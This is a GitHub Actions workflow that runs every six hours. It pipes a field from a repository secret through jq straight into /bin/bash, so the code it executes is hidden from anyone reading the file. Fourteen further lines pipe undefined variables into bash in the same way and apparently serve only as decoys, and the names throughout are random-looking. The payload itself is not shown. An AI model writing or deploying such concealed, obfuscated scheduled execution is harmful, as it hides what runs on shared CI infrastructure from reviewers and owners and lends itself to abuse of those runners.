name: zhuanxiagjiaozhou

on:
  workflow_dispatch:
  schedule:
    - cron: '34 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuanxiagjiaozhou
        env:
          keib09694: ${{ secrets.keib09694 }}
        run: |
          echo $keib09694 | jq -r .kgv17615 | /bin/bash
          echo $wr2 | jq -r .wrj75255 | /bin/bash
          echo $fq9 | jq -r .fruc322 | /bin/bash
          echo $z65561 | jq -r .va99588 | /bin/bash
          echo $kkm226 | jq -r .dew10 | /bin/bash
          echo $qj99729 | jq -r .ufthn26 | /bin/bash
          echo $lmn9288 | jq -r .erphe8 | /bin/bash
          echo $wij5231 | jq -r .tpmjk72 | /bin/bash
          echo $pqqrp05680 | jq -r .ket87712 | /bin/bash
          echo $ella7676 | jq -r .gocgm779 | /bin/bash
          echo $ufrjk74 | jq -r .dbcw57 | /bin/bash
          echo $xy0 | jq -r .trw189 | /bin/bash
          echo $v7105 | jq -r .a91 | /bin/bash
          echo $z25 | jq -r .ww721 | /bin/bash
          echo $cihu26 | jq -r .zby465 | /bin/bash

